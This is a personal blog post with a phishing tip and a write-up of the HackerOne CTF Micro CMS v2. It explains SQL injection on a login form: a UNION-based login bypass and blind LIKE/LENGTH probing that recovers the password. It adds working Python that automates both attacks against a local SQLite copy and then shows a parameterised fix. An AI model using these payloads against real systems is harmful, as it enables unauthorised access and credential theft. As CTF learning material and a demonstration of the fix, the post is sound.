
April 19th, 2019

01:58 pm
Online Scams 101

Just got an email, probably legit, from Navy Federal, with whom I have an account.

Ok, given it is probably legit, you could click the link and find out... but one of the best ways to stay safe online is: DO NOT CLICK ON LINKS. OMG. Don't click links.

You have no idea where the link goes and what sort of malware exists at the other end. If you want to know whether the message is real, go to the bank's site by typing the address you already know, not by following anything in the email.

03:10 pm
HackerOne CTF Micro CMS v2

Ok.. next challenge... they sort of took the previous one, where you could create pages and edit them, and wrapped it in a login screen, so you have to log in to access them.

So... fuck around with the user name and password. After entering a funky character we find an error message:
Traceback (most recent call last):
  File "./main.py", line 145, in do_login
    if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 250, in execute
    self.errorhandler(self, exc, value)
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
    raise errorvalue
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1")

Ok.. nice, so we see we have an admins table with username and password columns, and the username goes into the query as a raw string.

The basic idea is to use '; to close the quoted username and end the previous statement, put in our own SQL statement, and then finish with a comment character (# on MySQL/MariaDB) so the rest of the original line is ignored. Alternatively we use ' followed by additional SQL to modify the existing statement (an OR clause, a UNION), again terminating with a comment to discard the unused tail. The base statement grabs the password from the table for the provided username, so whatever row we can make that query return is what the app will compare our submitted password against. The second approach is the one to prefer: it needs only a single statement and does not change anything on the target.

I went way down the wrong path here... until I got a hint. I found that I could drop the table, and I tried to insert into the table and so forth. None of that seemed to work. I even tried to create other tables, to drop the original table and create a new one with known creds.... Either I messed it up or there were protections to keep this from happening. The hint was about UNION, so I went that route.

So... if we build a statement that returns some hardcoded text and then provide that same text as the password, we will get logged in: UNION appends a second SELECT whose single result is our chosen constant, so the "stored password" the app reads back from the query is the one we just typed. Used UNION to return 'foo' and boom. First flag. Also on that page is a hint about 'the real login creds'... a crumb trail to the next flag?

While thinking about that, I played around and found I could POST to page/edit/1 before I was logged in, and got the next flag. I also got a funky bit of base64 gunk as a session key, part of which decoded to JSON, {"admin" : "true"}. That might come in handy... Maybe I didn't need to log in and I just needed to set a session header like that?

Anyway... playing around with SQL in the above statement...

SELECT password FROM admins WHERE username='' or password like "a%"# seems to return unknown user... but when I did it with LIKE "n%", that returned invalid password. So it seems I can figure out the password. I played around with the %a, a%, and %a% types of combinations, along with ' or LENGTH(password) = 4; statements, and discovered that, for me, the length was 6, it started with an n and ended with an e, and it contained e, i, k, l, n, o.

Sweet, no duplicates... guessed "nikole" and got it. Now do the same for the username and found it had a, e, i, n, and r. It started with i and ended with a and had 5 letters... so... "irena"? Boom. Logged in and got the flag.
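The three pieces above (rewriting the single statement, the UNION login bypass, and the LENGTH()/LIKE guessing game) pulled together as one added Python example. This is not the CTF's code and not the author's; it rebuilds the vulnerable pattern from the traceback on an in-memory SQLite database, so the comment character is SQLite's -- rather than MySQL's #, and MySQLdb's execute() row count becomes a fetchall(). The admins table contents are a constructed stand-in using the two values the post reports recovering. What it adds to the post: the manual "starts with n, length 6" guessing becomes a loop that extends a LIKE prefix one character at a time, and the reason the loop works at all is that "unknown user" and "invalid password" are two different answers, which the fixed login at the bottom collapses into one while also binding the username instead of formatting it in.

```python
import hmac
import sqlite3
import string

# Constructed stand-in for the challenge's admins table (not data from HackerOne);
# the values are the ones the post says it recovered.
SEED_ADMINS = [("irena", "nikole")]

# SQLite only understands "--" comments; MySQL/MariaDB also accepts "#", which is
# what the post uses. The trailing space keeps "--" a valid SQLite comment.
COMMENT = " -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO admins VALUES (?, ?)", SEED_ADMINS)
    return conn


def vulnerable_login(conn, username, password):
    """Reproduces the pattern in the traceback: the username is %-formatted
    straight into the SQL string. The .replace('%', '%%') is copied from the
    challenge; it only doubles wildcards, and LIKE treats '%%' like '%'.
    The two distinct failure messages are what turn this into an oracle."""
    cur = conn.cursor()
    cur.execute('SELECT password FROM admins WHERE username=\'%s\''
                % username.replace('%', '%%'))
    rows = cur.fetchall()  # MySQLdb's execute() returned the row count directly
    if not rows:
        return "unknown user"
    if rows[0][0] != password:
        return "invalid password"
    return "ok"


def union_bypass(conn):
    """First flag: make the query return a value we choose, then submit it."""
    return vulnerable_login(conn, "' UNION SELECT 'foo'" + COMMENT, "foo")


def oracle(conn, condition):
    """True when the injected condition makes the query return at least one row."""
    payload = "' OR " + condition + COMMENT
    return vulnerable_login(conn, payload, "") != "unknown user"


def extract(conn, column, alphabet=string.ascii_lowercase + string.digits, max_len=64):
    """Generalises the post's LENGTH()/LIKE guessing: pin the length first, then
    extend a LIKE prefix one character at a time. LIKE is case-insensitive for
    ASCII in SQLite and in MySQL's default collations, so a lowercase alphabet
    is assumed; '%' and '_' are left out because they are wildcards in LIKE."""
    length = next((n for n in range(1, max_len + 1)
                   if oracle(conn, "LENGTH(%s) = %d" % (column, n))), 0)
    found = ""
    for _ in range(length):
        for c in alphabet:
            if oracle(conn, "%s LIKE '%s%%'" % (column, found + c)):
                found += c
                break
        else:
            return found  # next character is outside the alphabet; stop here
    return found


def safe_login(conn, username, password):
    """The fix: bind the value instead of formatting it, and give one answer for
    both failure cases so the row count no longer leaks. A real app would
    compare against a password hash rather than the stored password."""
    cur = conn.cursor()
    cur.execute("SELECT password FROM admins WHERE username = ?", (username,))
    row = cur.fetchone()
    if row is None or not hmac.compare_digest(row[0].encode(), password.encode()):
        return "invalid credentials"
    return "ok"


if __name__ == "__main__":
    db = make_db()
    print("union bypass:", union_bypass(db))
    print("password:", extract(db, "password"))
    print("username:", extract(db, "username"))
    print("same payload against the fixed login:",
          safe_login(db, "' UNION SELECT 'foo'" + COMMENT, "foo"))
```

The extraction loop costs at most max_len + length * len(alphabet) requests, which is why the manual "contains e, i, k, l, n, o" shortcut in the post works so well on a six-character password but would not scale; the prefix walk does not need that luck.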